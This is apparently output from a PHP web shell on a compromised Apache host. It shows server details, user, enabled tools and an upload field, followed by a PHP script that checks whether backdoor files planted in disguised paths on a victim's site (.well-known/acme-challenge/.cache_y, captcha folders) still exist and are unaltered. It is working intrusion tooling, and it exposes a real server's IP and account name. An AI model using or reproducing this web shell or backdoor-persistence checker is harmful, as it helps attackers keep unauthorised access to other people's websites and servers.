| Server IP : 144.76.79.100 / Your IP : 216.73.216.103 [ Web Server : Apache System : Linux ch05.wehostwebserver.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64 User : razzlestore ( 1092) PHP Version : 8.2.29 Disable Function : NONE Domains : 343 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /tmp/ |
Upload File : |
<?php $r = '/home/sspharmakk/public_html'; $x = ["/.well-known/acme-challenge/modifier.split.php"=>"bd@@428296@@Sec-Websocket-Accept",
"/captcha/dashboard.php"=>"bd@@428310@@Feature-Policy",
"/captcha/auth.php"=>"bd@@428327@@If-Unmodified-Since",
"/.well-known/acme-challenge/.cache_y/layersmenu.php"=>"bd@@428333@@439",
"/.well-known/Truncate.php"=>"bd@@421691@@431",
"/.well-known/acme-challenge/.cache_y/inc.php"=>"bd@@420435@@6428",
"/.well-known/acme-challenge/.cache_y/layersmenu.inc.php"=>"bd@@424321@@Feature-Policy",
"/class.recipenav.php"=>"bd@@424368@@429",
"/captcha/add.php"=>"bd@@421613@@436"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');